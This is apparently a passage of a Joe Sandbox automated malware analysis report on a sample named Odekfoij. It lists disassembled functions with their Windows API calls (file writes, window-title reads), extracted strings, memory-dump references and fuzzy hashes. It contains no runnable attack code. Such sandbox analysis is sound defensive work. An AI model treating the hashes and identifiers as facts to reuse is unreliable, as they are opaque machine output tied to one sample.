                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            Function 00403840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            Function 0040447A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            Function 00403743 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            Function 0040185F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59